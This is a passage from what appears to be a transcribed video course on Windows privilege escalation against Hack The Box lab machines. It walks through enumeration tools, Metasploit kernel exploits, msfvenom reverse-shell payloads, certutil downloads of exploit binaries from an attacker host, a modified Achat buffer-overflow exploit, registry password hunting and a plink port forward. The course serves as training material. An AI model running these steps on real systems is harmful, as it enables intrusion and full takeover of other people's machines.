a text file and then it goes in here and it checks things for vulnerabilities and it tells us hey it might be vulnerable to this this or this I mean that's great it's just another vulnerability Checker something that we can use to check ourselves and the last one I've got here is seat belt seat belt is another sln file meaning you have to compile it so if we go back into our PowerPoint little presentation uh the only one we didn't cover is the exploit suggestor from Metasploit very similar to what the rest of these do it's just running off metasplay and we'll see how that works we'll see how the windows exploits adjuster works here very very shortly so again don't fret if you don't see all these right now I'm gonna pull up really quick also this is just a windpies I ran on my machine as a non-privileged user so we've got an account here as my wife and we're just gonna say hey here's a non-privileged account and I'm not going to show you everything just to um I'm just going to show you some of the cool stuff so it's in color it's nice and neat and it shows you hey here's the legend if it's red uh something is misconfigured or if it's green it's well configured and then it's got the different things here and it says we're looking for information on this computer here it is it's Windows 10 machine here's your system info right Windows 10 here's the hostname here's the architecture here are the hotfixes so remember the wmic qfe it's pulling that for you and it's saying hey you're bad you haven't updated this in a little bit and we're actually running Watson from rostermouth so you just saw that tool came through here and it's got a couple potential vulnerabilities that could allow for escal relation it says hey what's the Powershell settings these are important to know especially if you're going to run any sort of Powershell type vulnerabilities Against the Machine it's good to know if you're on version two if that's enabled if version 5 is enabled or if you're only on version 5 or version 2. come through here you see more information what protections are on any cash credentials what are the user environment variables these are all really good uh let's scroll down just a little bit Drive information you can see what drives are attached to this machine what AV information is here so all the things we've covered right are just in here UAC status users information where they have access and then it just goes It goes all through this so current token privileges which we're going to cover later if there's any clipboard text who the logged in users are who the RDP sessions are so this is really really really nice I won't go through the whole thing I will scroll down to the bottom so here Windows credentials and it looks for all different kinds of credentials and it's been doing this in password files and other things but look it's looking in the windows Vault credential manager are there any credentials anywhere that we can find and this is is kind of what I was telling you like Hey we're gonna look for uh we're gonna look for things in the credentials look looking for saved Wi-Fi all the things we just talked about a few minutes ago here it is is checking that it's checking for browser information uh any sort of thing it looks like uh there may be some some saved logins in the cookies for Chrome so maybe there's a vulnerability there so these are all the things it looks at it looks at processes there's so much that I kind of skipped over here but I want you just to run this on your own go download it run it on your own if you need help getting to the executable I can show you where that's at too before we take off here but if you see the winpies there's the bat file and the winpies exe if you click on it now you see there's an sln here but don't worry about that they actually do provide the executable so if you click on winpies right here and you click on bin you're always looking for bin x64 x86 depending on your architecture and then we're going to go ahead and click on x64 because that's what most of us are on you download the winpies.exe and you just run it so it's it's as easy as that it stays up to date look the last commit was seven days ago so that's that's awesome uh so you just want to make sure that you run this it's not going to do any damage to your computer you can I would recommend running it as a low privilege user if you run it as a high privilege user you're going to see uh all kinds of Christmas tree colors going off in your your scan so I would run it as a lower privilege user but in the next video what we're going to do is we're going to uh try to use a couple of these tools you're going to see them fail and then we're going to use a couple tools that actually work for us and it's just going to prove the concept of you can't know about too many tools and you should have a wide array of tools in your in your tool belt so we're going to see all about that in the next video and we're gonna do a little bit more enumeration get towards popping our first shell or popping our first prevask uh in this course so I will catch you over in the next video all right for the first half of the video I kind of just want you to watch and then when we get into the second half of the video you can go ahead and partake in what I'm going to be showing you so the one thing I do want you to do is go ahead if you're in an interpreter shell go ahead and change your directory and change it to C Windows temp and make sure you do your escaping like this and I've gone ahead and downloaded a couple different tools one tool that I've downloaded is winpies so I'm going to go ahead and upload winpies and all I'm going to just say is upload and I just lost my shell so let me go ahead and run that really quick and re-pop the shell and we're going to upload it and let's see their present working directory let me change it one more time so Windows temp and what we're going to do is we're going to upload I've got it in root downloads and then I've got winpies here.exe okay and this is the x86 version so then I'm just going to drop into a shell and I'm going to try to run this and I'm going to go ahead and just say winpies dot EXE and nothing happens why is nothing happening because it's likely that we do not have the 4.0 version of.net 4.0 or greater so we're likely encountering an error nothing is happening here we don't see all the pretty colors or anything that we saw before all right that's fine well what about a tool like power up I could probably run power up let me see if I can get into a Powershell real quick so I'll do Powershell execution policy bypass and then it just hangs so I can type a command who am I anything nothing's gonna happen here so we see sometimes in shells like this where this just hangs so that's fine okay well maybe I can go back and in meterpreter they have a load Powershell feature so I can load Powershell load the power up file that I have and just give it a go that way well I tried a little Powershell and look what happens to me it kills my interpreter session well that's not very nice so now I gotta go get another meterpreter session so what we're what we're up against here is we don't have the capability to run a executable we don't have the capability to run a interpreter or Powershell so we're gonna have to get creative there's other tools out there I just showed you four different ways to do this so the first thing we're going to do we're going to get our shell back and then what we're going to do is we're going to run the post exploit module from Metasploit that is a suggestor so what we're going to do here is we're just going to type right in here we're going to say run post and we can auto complete this and then we just say post multi Recon local exploit suggestor and it's going to collect all the data from this box potential exploits here I'm going to open up a text editor because I'm going to save this out and I'm actually going to open up a couple tabs because there's a couple things I want to do we're also going to drop into this box and we're going to grab system info so while this is running what I want you to do is I also want you to come into here and I want you to come into the Aeon cyber here and so this is the windows exploit suggestor.pi go ahead and download this so if you need to just go to Google go to GitHub Windows exploit suggestor again this was provided in the last video now all we're going to do is just clone or download this we're going to download the zip and we're going to open with and in case I did not make it clear make sure that you run this as well so now we're hands on we're doing other checks but you can see here that look at all the different things that it comes back with uh as potentially vulnerable this is a lot and these are all for the most part here what are called kernel exploits and we'll get to those in a little bit so right now we're just collecting information okay we're just running our tools we'll get to the kernel exploit portion in just a minute but we have a lot of options right a lot of options here and what we're going to do is we're going to save these out I just want to copy these and then we'll also get information from our other tool so we need to go into a shell and we just need to pull down system info like this okay just type in System Info go ahead and scroll up and copy everything and then paste it into a document and you can just save that out so go ahead and save this it's going to ask you what do you want to save it as and we're going to save it as uh we'll just call it sysinfo.txt okay and we're also going to extract the zip that we have so let's go ahead and extract the windows exploit suggestor into our root and if we go to the GitHub again we scroll down a little bit it says hey you need to run the explo suggestor.pi with update so I'm just going to copy this we're going to update the database so let's open up a new tab and I'm going to just do this I'm going to CD to my root or wherever you save the file at I'm just going to paste this so again dash dash update it says Hey we've updated okay what's the next step it's going to say hey what's the database so we need the database and whatever that database just was we also need to install the dependencies actually so we're going to do install python xlrd which is going to be pip install xlrd upgrade so go ahead copy and paste that now you might have issues with Pip being installed if you don't already have Pip installed so I'm going to go ahead and copy out a one-liner for you guys that I utilize to install pip you might be able to use pip 3 but just in case here is that one liner okay I'm pasting it here so it's going to be a curl and then we're going to say https double dot slash bootstrap dot Pi PA dot IO forward slash get Dash pip.pi a dash o we're going to do a get Dash pip.pi semicolon here and then we're going to say python get Dash pip dot Pi now I'll try running this I've already got pip installed you're gonna see that it says Hey successfully installing pip that's fine it just overwrote it so make sure you install that if you do have a pip issue on your machine if you already have Pip installed that's great and then we're also going to do the PIP install xlrd dash dash upgrade okay so now from here make sure you know what database you have so we've got the xlx S here or the XLS sorry uh so we're going to say windows explo suggestor.pi and we're going to follow the syntax that it has so we need a dash dash database dash dash database and then we're going to say let's see if it's saved it out here 2020 it did and we also need to know the dash dash system info so we're going to say dash dash system info and we'll say sysinfo.txt just like this so go ahead and run this and it's going to go and try to collect this see what vulnerabilities are out there that might exist and the nice thing is it updates look we have an updated database here and we know exactly what we're up against so even more modern updates or more modern exploits may fall into here so it identified Windows 7 32-bit and you can see that it came up with some vulnerabilities for us to try as well so we have different vulnerabilities we can look up these different ms010 or one zero zero one five for example or zero forty seven and see what's in here and you can see a lot of these say hey Windows kernel Windows kernel Windows kernel well that's a little bit of foreshadowing we're going to get there here in just a second so here's the takeaway let's let's take away in a big summary there are a million tools that you can use out there win peace is probably my favorite because it's just an executable that you can go out there and run but as you saw when piece doesn't work all the time okay maybe we need to try something like power up power-up's a great tool as well I would use windp user power up first if you can't get Powershell if you can't get the executable to work okay there's still options if you're in an environment where you don't have medicine you can't use Metasploit then you don't use meta's blade you don't have the suggestor that's okay there's this suggestor you run system info you pull it down you get this there may be roadblocks there's there's okay there's always going to be roadblocks if Windows priv ask any prevask is very difficult and a lot of the times they make it intentionally difficult they put in intentional roadblock so make sure that you know there's other options there's always other paths this box is vulnerable it's meant to be exploited you're gonna figure it out so the big takeaway know your tools have good notes again as always have good notes write this stuff down notate all the tools go play with them play with them now put them in a lab environment try them on your computer do whatever you need to do but play with these tools understand what they do why they're doing what they're doing okay so take advantage of your time there's no need to rush through this go play with these tools run them on unhack the box run them on anything run them on a CTF run them at home figure out what they do and utilize them now in the next section we're going to start working on our exploits we're going to start talking about kernel exploitation and kind of just going from there so we're starting to get into all the privilege escalation tactics we're out of the enumeration portion and I'm ready because we're about to start firing through all kinds of boxes and learning different tips and tricks and it's it's really exciting so I'm excited to see you over in the next video when we we root this box a couple different different ways and then we'll move on to the next one and keep going from there so I'll catch you over in the next section all right let's get to exploiting so the first exploit we're going to learn about are called kernel exploits so here's a quick overview of what a kernel exploit is so what is a kernel well a kernel is a computer program that controls everything in the system and if you see my source at the top am I quoting Wikipedia yes I am I'm that confident in Wikipedia so it is a computer program okay and it facilitates the interactions between hardware and software components if you see here in the little graph we have the kernel which lives in between the applications and it feeds interaction between the CPU memory devices it is a translator okay so think about it as a translator look at this next picture this is more related to Windows so you can see here is the kernel here is the user interaction here's the windows API Etc we have our operating system kernel here all the way down to the hardware so the kernel itself is converting these input and output requests from software okay into instruction sets so it's putting them into these instruction sets and it's interacting in between these two objects Okay so it's important that uh it's an important feature right of of the operating system it is the core of the operating system and at the core we can exploit so that's what we're going to be taking advantage of is an exploitation of a kernel now when you recall we were looking at CIS info and sysinfo was telling us hey what's the build of this operating system what are we on what version what operating system are we on Etc we want to know that because there are certain kernel exploits related to specific builds so whatever the build was at that time there are kernel exploits available for it to give you an idea as to how many kernel exploits there have been there is a GitHub out there and I will provide this as well as a resource that's called Windows kernel exploits and let me just kind of scroll through all right so you can see that we have 2017-2018 but it starts with O3 all the way down to ms-17 and 0 1 0 was one of the very very big ones so it has all the links here for all the different kernel X plates there's a lot right there's absolutely a lot and if we take advantage of this if we own the kernel we own the system so that's what we're trying to do if a regular user can perform this kernel exploit and get successfully get the exploit well then guess what we are now the system and that's what's going to happen here so we're going to take advantage of a well-known kernel exploit and we're going to utilize that to elevate our privileges on the system so in the next video we'll take a look at the metasplay method then after that we'll do the manual method so I'll catch you over in the next video all right are you ready for your first exploit I'm super excited about this so first we're going to start with Metasploit and just see the power of Metasploit and what it's capable of after that we're going to shift off into the more manual exploitation so remember we ran the post multi exploit suggestor and we got quite a few of these that came up now what's happening is it's saying hey I think that this machine is vulnerable to this bypass UAC Event Viewer in Kutcher pod and this uh schedule elevator okay and for me from personal experience the ones I like to Target are some of the earlier ones this kitchen pod seems to always be a winner for me though in this you might want to do a little bit more enumeration make sure but if you're in like a CTF or even a you know like one of those environments you can just kind of copy these and fire away and see if it works I always recommend firing a couple times but we're going to go ahead and try this exploit a couple times see if it works for us now if you're interested in learning more about kitchen pod and why it's vulnerable if you're into that nerdy nerdy stuff which I know a lot of you are here is a write-up on it from seclist.org I will link this in the resources as well so you can come in here read exactly why it was vulnerable what was happening and then if we come into the affected software you can see that it affected all 32-bit versions of Windows NT including Windows 2000 all the way through windows 7. so upon successful exploitation the kernel stack is switched to an attacker specified address okay so let's go ahead and try running this so what we're going to do is we're going to background our session and mine is session nine so just notate whatever you have and then I'm going to say use I'm going to paste the exploit Windows local ms10 say options I'm going to set my session to nine and then I'm going to set my L host to Tunnel zero and I'm going to set my L port to 55555 because we exploited on four four four four so let's make it a different port here let's try running this see what happens okay didn't let's do options let's try and see what's going on and see it still set my L host back let me go ahead and set my L host one more time back to Tunnel zero I'm going to run this again okay you can see it ran and we now have a shell interpreter session I actually lost my session in the middle of recording so I actually went back if you saw a little bit of video editing magic there but went back so session 10 and then session 11 is now this if we say get uid we can see we are Authority system so if we go into shell we can do the same thing and say who am I you can see we're Authority system we now have escalated this machine so we took advantage of the post exploit suggestor we took a well-known kernel exploit and we utilized it to elevate our Privileges and we used it all through interpreter very very very powerful we had a shell very easily we had full control of this machine very nice very easy and then all we had to do was set a couple of parameters run it and then guess what we elevated the system very easily so you're gonna see some boxes like this when you're doing CTF or you know they Capture the Flag hack the Box try hack me whatever site you're on if you are wanting the quick win and you can use Metasploit in your environment this is a great one to utilize very very great one to utilize one of the first things I'll try if I'm in an environment like that if you are trying to avoid using Metasploit then we will cover that in the next video on how you can do this from a manual perspective including getting the shell we're going to completely go backwards we're gonna we're gonna get a new shell in netcat and then we're going to elevate from there so I'll catch you over in the next video when we do this all again manually all right let's do this the manual way so remember we generated a payload with msf Venom and we utilize that to get a meterpreter shell this time we're going to just utilize it to get a basic netcat shell so what I'm going to do is I'm going to say msf Venom and I'm going to say a payload of windows and then just shell reverse TCP I'm going to give it an L host of 10.10.14.5 which is my current lhost at this time and then L Port I'll just stick with 4444 remember the file type again is aspx because we're up against an IIs server and I'm going to put this into something called manual.aspx and we'll let that generate now at the same time we're going to go ahead and go over to this new tab and I'm just going to make a connection to the machine 10.10.10.5 on FTP remember we have Anonymous login so I'm going to log in and then I'm going to just go ahead and just put the manual.aspx there we can go to a new tab and what I'm going to do is I'm just going to run netcat mblp all four so we're setting up a listener on all fours here and I'm going to go out to Firefox we're going to go and just say hey 10.10.10.5 and then manual.aspx look at our connection and hey we've got a connection we're not using my display whatsoever so we do a quick who am I and you can see that we are the IIs app pool okay so we know that this is a kernel exploit and we're going to take the alternate path now I showed you how to run the windows exploit suggestor well with Windows xplate suggestor when we ran that what came back for us well we've got a bunch of these different potential kernel exploits we've got some Internet Explorer exploits I wouldn't look at these I would start right away with the kernel exploits and kind of work my way up from the bottom of the list so we can go and just say something like Ms 10-015 exploit and you're going to see what that's going to actually bring up so we'll do Ms 10-015 exploit and it's going to bring up the windows kernel exploits the SEC Wiki so look at that so if we look at this one guess what it is it is kitchenpod the one we actually ran before now we're not going to be able to actually run this one if we take a look at the proof of concept the proof of concept shows a shell spawning and then we actually spawn a new command prompt utilizing the executable that they're giving so they're providing this executable it pops a new shell and in the Shell your Authority system we're not on a machine that is capable of getting a new shell we're not on like RDP or anything like that where we have a GUI interface so we just kind of have to deal with the shell that we're given which is just this basic shell here so we need to pop something that can run inline on this shell so that one's out of the question so we can start working our way up we can look at 047 and 0.59 so if we go to 047 in this list and I just like to look through this list because it has compiled exploits already and you see 47 doesn't exist but 59 does so I'm going to click on 59 and there's just this churrosquito.exe ZIP um and there's not really much on the readme it shows you the churrosquito.exe how to run this you can looks like you can run a command.exe and get a net user and add a user that's one way of doing it so what about we look this up ms10-059 let's see what exactly this is I'll just type in exploit maybe there's more information on it somewhere so chimichurri is the other name for it and this is a very well known exploit uh as chimichurri we can look at the exploit database as well and just see what kind of information we can find about it so we can look at a screenshot.png and see what they've got here so if you look at this it runs a chimichurri and it says this exploit gives you local system shell usage is chimichurri IP address Port so then it says ok chimichurri.exe Port 8000 and then you can open up another Port here for a thousand and establish a connection as well so we'll take a look at how this is going to work let's see if this has any information on the chimichurri itself either it does not so what it looks like we need to do is it looks like we need to provide an IP address which is hiding here tell it what port we want to connect back on and it's just like a reverse shell so we're going to go ahead and just give this one a try and see if this exploit works and if you want to do more research on it you can absolutely go out to Google and just say chimichurri exploit and see what information you can pull down there's the ms09012 as well for this one so what we're going to do is we're going to download out this Ms 10059 exploit I'm just going to click on it I'm going to download it save it and looks like we've got contains malware I'm going to go ahead and just go open which should store it on your computer if you see that error so from here I'm going to CD over to my downloads folder and I'm going to do a quick python-m simple HTTP server and if you want to run in Python 3 you can as well remember that's python3 Dash M HTTP dot server so what we're going to do here is now we're loading up our basic server we're going to go ahead and just make a simple get request so we're going to say let's go to maybe uh CD well dot dot well dot dot one more time and we'll just CD into 10th let's see if we can write into temp so we'll do a cert util and we're going to use this to transfer files it's just like wget so we're going to say cert util URL cache and we'll do a file we'll say http double dot slash slash 10.10.14.5 whatever your IP address is and then we're going to say ms-10-059.exe I do believe and I'll just call this ms.exe when I bring it over let's see if it actually gets that file it's taking just a little bit here and looks like it has got the file successfully so now if we do a quick draw let's see if the file is in here ms.exe does exist so if we say ms.exe it says this exploit gives you a local system shell usage ms.exe IP address port okay so I'm going to say ms.exe my IP address is 10.10.14.5 and let's just call the port all fives and what I'll do is I'll go ahead and open up another netcat on all fives and then we're going to go ahead and just hit enter cross our fingers say who am I and we are Authority system I love kernel exploits they're so easy so again we had the ability here to look through we lost it there it is to look through this Windows X-Play suggestor and this is just another tool set right so we didn't have the ability for the other tools when we were doing our enumeration we didn't have the ability for any sort of Powershell or any exe so we utilized Metasploit and we utilize their suggestor and they have the ability to run kitchen pod we did not so this easy easy one the kitchen pod is really nice and metasployed not so nice on its own but we looked through the list and we find one that kind of works for us I again like this this Windows kernel exploit SEC Wiki because you can just come through it has it already compiled for you and super easy to to run and run Against the Machine usually they have a little bit more information than these but the chimichurri exploit has been around for quite some time it's one that I'm very familiar with and you'll see come up again so keep that in mind if you see a box vulnerable to Ms 10059 chances are you can probably run that exploit and give it a go worst thing that's going to happen is you're going to try it and it's not going to work and then you move on to the next one but I would work my way up from the bottom list you'll come up with your own sort of methodologies and your familiarizations as you go you can see most of these were uh Internet Explorer related anyway but we're interested in anything that is Kernel related that could have escalated privileges so there were only a few options in total so that's it for this lesson we were able to take a completely meta splatable walkthrough and turn it into a completely manual walkthrough utilizing the same sort of tool sets so from here what we're going to do is we're going to start looking at another escalation path which is passwords and it's going to be a pretty fun box so we're going to move on and take a look at that escalation path and take down another machine on hack a box so I'll see you over in the next section on to our next escalation path which is passwords now remember in the initial enumeration section we talked about password hunting that's going to come into play here and it's going to come into play as a method of escalation so my challenge to you is going to be to try to get initial foothold on a machine just like we did before this new machine that we're going to be looking at is called Chatterbox so if you do a control F and start typing in chatter you'll see Chatterbox is right here and it lives at 10.10.10.74 so my challenge to you is to go ahead and just hit play on this machine go ahead and get it scanned and then try to escalate it if you get stuck you can't escalate it or you want to see the walkthrough the next video is going to be the walkthrough on how to gain the initial foothold the video after that will be the escalation using some sort of password mining now I do have a hint for you there are several guides that I provided in the beginning of this course this guide here as an example could provide you the answer on how to get root within a quarter of the page so we have the basic enumeration we go into clear text password hunting and we go into what services are only available from the inside and more importantly how to use plank so those are some some hints I'm dropping for you so go ahead and give Chatterbox a go I want to see if you can push all the way through using only new enumeration we're not going to use any tools in this box even in the Walker no tools so go ahead and try to do this all on your own from start to finish if you get stuck at any point come check out the walkthrough the answers will be there so I'll see you over in the next video as we gain an initial foothold on Chatterbox okay so let's look at our nmap scan we don't have a lot here to go with we have this a chat system and then we have an a chat chat system here looks like this is over HTTP and then there's an a chat here so the first thing we might do is just something quick like search Beloit and say hey what's a chat and we can also of course go over to the actual exploit itself and see what's running so or we can go over to the web page itself and see what's running but here we can see there is a remote buffer overflow there is one in metasploy and there's also a manual one this 36025 dot Pi so if we go ahead and we just uh we can copy over the user share exploit database and then we'll do exploits windows remote and then three six zero two five dot pi and again if you don't see that path the path is right here up top and then the rest of the path is right here so I'm just going to copy that and I'm going to just copy it here I'll just call it three dot pi so we'll put this in our directory and then if we go ahead and just G edit or whatever your favorite editor is and just look at this we can see the actual exploit itself so this is a buffer overflow exploit and it looks like a very very typical buffer overflow they actually give us the msf Venom here and before we dive in and we just say hey we're for sure on this we can make sure and go check out and see if there's any more information on this just before going through all the trouble and firing away so we might just go out to Google and we might just say something along the lines of a chat exploit and see what's out there so we've got this one here we can open it up see if it's any different this is the 36025 it doesn't provide any information sometimes at the top it tells you hey there's you know this is a buffer overflow exploit and a little bit more information on that I don't see anything here uh rapid 7 does have something on it we're going to avoid using metasplay for this one but it says this exploits a Unicode SCH buffer overflow and hat so by sending a crafted message to default Port 9256udp it's possible to overwrite the SCH a Handler so this is running on Windows XP Service Pack 3 and Windows 7 that has been tested on so if we go back to our scan let's see if it tells us anything about the OS gas uh it's guessing Windows 8 some sort of Windows version but it doesn't know exactly what it is so there's nothing reliable there either so we don't have a lot to really go off of we can also go over to the a chat itself so if it is living on Port 9255 we can go and look at that really quick and see what's there so we can just go http double dot slash 10 10 10 10 74 and then nine two five five and see if that takes us anywhere which it doesn't look like it did try one more time 10 10 10 74 and then 9255 I'll copy that just in case but it looks like it's not going anywhere for us so uh so we can't access the page there's not much going on even the site doesn't have a title so it looks like there's nothing really there so we kind of just have to have to make a guess at this and see what we can figure out so I'm going to go with the buffer overflow exploit and we'll see what we can do so I got it open in G edit now the thing that I see here is they have a platform Windows architecture x86 that's fine but the payloads is execute which executes a calc.exe so whatever they're running it just pops a calculator up so it's not really what we want but they have gone through and if you're familiar with buffer overflows it's gone through and just done the bad characters for us which is really nice so we don't have to worry about Bad characters or any of this and they give us a command kind of so what we can do is we can just modify this command a little bit we can just say windows and then we'll just say something like shell reverse TCP select shell reverse TCP and then instead of calc.exe we're going to take that out and then we'll do L host is equal to your IP address so mine right now is 10.10.14.4 and then we'll do an L Port I'm just going to choose 443 the encoding and everything else is fine we just want this to pop a reverse shell so I'm going to copy this and I'm going to go ahead and just open up a new tab I'll make this bigger for you guys and I'll go ahead and just hit enter this should generate some Shell Code for us so again we're doing architecture of x86 platform windows and then we're doing the windows shell reverse TCP so we're going to have to run netcat here in a second so let's go ahead and copy this down and paste it in I'm just going to replace what's in here it's a little bit larger of code they had 512 on the bytes let's see what we ended up having 774 so hopefully that doesn't mess with the address space we should be okay but we'll we'll take a look at the end of this and if it doesn't work maybe we'll have to adjust it but we'll come through here if we scroll down we got to create a UDP socket so we have to go over to the UDP address itself we're going to go and navigate to 10 10 10 74. and I'm going to go ahead and just save this out so this is going to make the connection it's going to do a little bit of this code and then it's going to inject the buff here for the code and do a little bit more advance of a buffer overflow this is a 32-bit SCH bypass so it's The Next Step Above if you have seen like the volume server exploits or something along those lines it's just the next step above that with the SCH bypassing so we're going to go ahead and just try to fire this one off so what we're going to do is we're going to run netcat here and we'll do nvlp of 443 and we're also going to just go ahead and try running python 3.pi now big caveat to this box and you may have run into some issues with it is that if you are not the first one to run this exploit against this and it doesn't work uh then there's a chance that somebody else has done it you only get one chance is what I'm trying to say you get one chance on this exploit so if it doesn't work you have to reset your box or if it works and you lose a shell or whatever you have to reset your box it's the only unfortunate thing about this one let's go ahead and run this see if we get any kind of shell we got a connect oh we got to connect from my machine let me turn this one off sorry and let's go ahead and run this one more time there we go so sorry I was trying out some exploits earlier from a Windows 7 machine so okay we got the connection here we ran it we're good to go so now if we say who am I you can see we are Chatterbox Alfred we are not system on this machine so we need to improve upon that all right so from here I'm gonna go ahead and hit pause and we're going to move on to the next step which is going to be the escalation so what we're going to do is we're going to escalate this machine again if you want to give it a go I have full faith at this point that you could do it again you can use this privilege escalation guide follow everything down to the point of this net stat with plink so if you can kind of piece it together look at the the netstat running on the machine look at the ports that are open and then hunt some passwords down since this is a password hunting section it's a little bit of a hint and see if you can figure it out and then I will catch you over in the next video when we walk through the rest of the steps all right so we've gained lower level privileges on this machine and now we're going to start doing some enumeration so we could do quickly first a system info and just see what we're up against you can see we've got the 2009 Microsoft Corporation copyright so it's telling me we're probably up against something like Windows 7 or even something earlier than that so what we're going to do is we're going to take a look real quick just take a peek and you can see we're up against a Microsoft Windows 7 host name of Chatterbox we got a service pack one on the build so that might be important if we're looking for something like a kernel exploit now you do have the benefit of knowing ahead of time what category we're in so we're actually looking for some sort of password exploit but we're going to continue on as if we don't know what we're doing so we're going to go ahead and look here for more information so we're going to notate down we've got Windows 7 Professional 6.1.72601 and then we've got service pack one that's great what are some other things we can look at well we can find a quick who am I see we are Alfred and we could say okay what about net users what users are on this machine well Alfred's on this machine and then there's administrator we can quickly check net user Alfred and see what kind of permissions we have and I'm more specifically interested in something like local group membership and you can see we're only in the users group so we're not in the administrators we're not an administrator so we don't have the right to escalate privileges here well that's fine we can keep looking around some other things that we want to look at are the IP information right so we want to do a quick ipconfig just see what's going on it looks like we've only got one IP address here we're not dual homed or anything like that we can do a netstat Dash ano take a look at that really quick too and this one actually proves to be interesting so looking at this one we see that we have an established connection here on 443 we see the two ports that were originally in the nmap scan this 9255-9256 the 139 I don't recall showing up but it's saying that it's available I didn't see it so I'm not sure if it just didn't show up in our scan or if it's hiding from us or what's going on however there is a few ports here or there are a few ports here that show up that are listening on the local address of 0.0.0.0 but they're not actually open and available to the outside these are internal ports one being 445. 445 being SMB now keep this in the back of your mind because 445 SMB that means that some sort of file share or way that we can connect but we can use a tool like PS exact or like win exe or something along those lines that can allow us to connect this machine with credentials now we don't know credentials of any user but say we got credentials somehow and that could be a little bit of foreshadowing maybe we can utilize this port to log into the machine so let's take a look further and let's go out to our Firefox and let's go to that privilege escalation guide let's kind of just do a quick run through we've looked at the who am I we've got system information we know the host name we've taken a look at the net users and we've taken a look at specific net users we're not on a domains we're not too concerned about that we could take a look at the firewall State we have looked at the ipconfig we haven't looked at the routing table or the ARP the chances are we're not really communicating with anything but we can take a look at ARP really quick as well ARP Dash a and we're only connecting with DOT two and Dot 255 so these are pretty common here this is nothing that I would say is out of the ordinary this is your broadcast address and then your dot 2 is likely the router or where it's routing through in the Gateway so nothing of particular interest there next on the list we have clear text passwords now we can search through this individually and go you know find string password and we could do one of those longones.txt.xml.ini and kind of do one all in the C drive maybe and kind of look through the C drive see if there's anything out there we can look for those backup files of the Sam kind of like we talked about in the enumeration video we can look at some of these things as well but I'm going to kind of skip ahead just a little bit to the registry and this could be a really quick win now we could do a quick search of the registry and the reason why I'm skipping down to the registry is because if we do a fine string in something like the C drive it's going to take a long time so I'm really looking for quick wins right now and then maybe if I don't get the quick win then I'm going to start trying to hunt down something that you know might take a little bit so I might run this step away for a little bit do other enumeration while this is running Etc but the registry is pretty quick so I'm just going to copy and paste that and we're just going to take a look at what comes back now this is going to be difficult to look through but we're going to try to see something that might come out as being a password I've already seen it show up but if you scroll through this really quick and you look like these don't really look like passwords but the more you scroll down and you see something along the lines of Welcome one exclamation and default password now on the note of Welcome one or welcome exclamation or anything along the welcome one exclamation lines I see this more times than I want to admit in real pen tests this is a very very common password so it's funny seeing that here but it's not a coincidence it's something that actually really shows up with weak passwords so going on from this we just saw that we have a welcome one and we see it's in the win logon if we go back to our enumeration script take a look at the win logon down here we can say hey Windows Auto login and we've got the win log on here let's query that whole registry this little part of the registry here for the win logon and let's get a little bit more information so we can just do a reg query and you could actually copy the same thing right here if you wanted to but I'm just going to go ahead and just do the reg query command and it's going to go ahead and search for me looks like I copied a space which automatically triggered an enter for us if we scroll through it you can see that we've got a username too of Alfred and welcome one exclamation well that's great it looks like maybe we just found Alfred's password and what could this do for us well we don't know yet and we don't have anything on the machine open right we don't have SSH or anything where we could log into SSH with Alfred and kind of maybe improve our shell because we're in this funky shell where if I even like tab or something you know I type a weird character it just doesn't work really well for me um but what we can do is maybe improve it we don't have that option or if we had something like SMB we could do a PS exec attack and try to elevate we don't have that option either and with Alpha being a low level user PS exec really isn't going to work for us so that's kind of out of it but what if for example Alfred is a user who is also an administrator but they're just logging in as their regular account and then they provide credentials when they want an administrative action that's actually pretty common right so what we're going to think about is maybe Alfred's just reusing his password we've got these credentials we might as well give it a go and just see if Alfred is now we're going to start piecing some things together we're going to start doing a port forward and we're going to talk about that and the thing we need to do to do that port forward remember the net stat and then we just do a dash an O again remember netstat we have 445 open we can attack 445 if it's open publicly how can we do that well we can trigger a port forward we can say hey I want this port to communicate to another port and we'll forward it so how are we going to do that we're going to use a tool called plink and I want to download the latest version of plink because you might have issues if you use the one that's built into Cali depending on the Kali Linux version you're on so let's quickly just go to Google and we're just going to search plink.exe and we'll just say something like putty download that's a good one and we're going to look for the first release here this chiarc.green end or greenend.org.uk looks just like this so what we want to download is plink and if we look at what plink is it's a command line interface to the putty backends okay do we know what putty is putty is just an SSH telnet client if you've never seen putty I've got an example of putty here and this is just what putty looks like you just type in an IP address you type in your port and you say hey I want to connect to that I use this all the time so we're doing something on the command line using a tool called plink place going to allow us to run a port forward so what I want to do is I want to download the 32-bit version of plink so go ahead and just click on this and download it so save your file and what we're going to do is we're going to create a port forward so what we need to do is open a new tab so I'm just going to open a new tab here and then I'm going to blow this up and I put plank in my downloads folder should have been where it was we could just do an LS really quick and grab on plink and you see if link.exe is there so what I'm going to do is I'm just going to do a python-m simple HTTP server on Port 80. now you can do this one or you could do the Python 3 method if that is your choice which remember we can do it I'm going to run this and then cancel we could do python3 Dash M it's just http.server all right so I'm going to run the pipeline too just preference doesn't really matter so python 2 is running what we're doing is we're hosting this web server we're going to go ahead and go in and download this file my favorite way to download a file is using a tool called cert util cert util allows us to do something similar to like a w get in Linux and since we're in this kind of basic shell it's kind of my go-to so what we'll do is we'll just CD over to the users folder you can also try doing it in the temp although when I did my first run through this machine I did not have a lot of luck in the temp folder so we're in the user folder and we should have write privileges to this so what I'm going to do is I'm just going to say cert util Dash URL cache and then we're going to just do a file and the file is going to go to my machine my machine is now at 10.10.14.5 my IP has actually changed and 14.5 we're going to say plink.exe and we're just going to call it plink.exe okay we'll do a click there make sure plink.exe is there and it is now on the Cali side there is an important step we need to do what we need to do is we need to come in here and we need to do a quick apt install of an SSH server so we can say apt install SSH now I've already got this installed then you might as well but it doesn't hurt to run this command and see where you're at if you do need to install it go ahead and pause the video and just hit yes on the install let the install happen and then what we're going to do is we're going to make a quick modification to SSH itself so what we're going to do is we're going to go ahead and just say G edit and we're going to edit the SSH sshd config and what we're going to do here is go into here and we're looking for a permission in here that says permit root login uh so you see it says prohibit password and it's actually commented out we're going to uncomment this and we're going to say yes permit that root login and I'm going to save it so what that's going to allow us to do is log in as a root and here's what's going to happen go ahead and do a quick service SSH restart make sure you restart your SSH service and actually if just to make sure it's enabled just do sh start make sure the service is started and let's go back to our machine so we're going to utilize plink and the command looks like this we're going to say plink .exe we're going to do a dash l l actually stands for username our username is root a dash P for PW actually for password and my password is tor I'm very very secure a dash capital r the capital r stands for port forward so what this means is I'm going to say hey on Port 445 for this machine I want to go ahead and open that up remember one two seven zero zero one and I'm going to give out 445 to the other machine which is going to be us so this is a port forward okay so this is going to allow us to access this machine this port from our machine so here's how that's going to work if that's confusing just go ahead and hit enter it's going to say hey do you want to store the key in the cache just go ahead and say yes and now it's going to get at this screen and yours might stick like this just hit enter a couple times and keep hitting enter and you can see that you're brought to a root login now look your 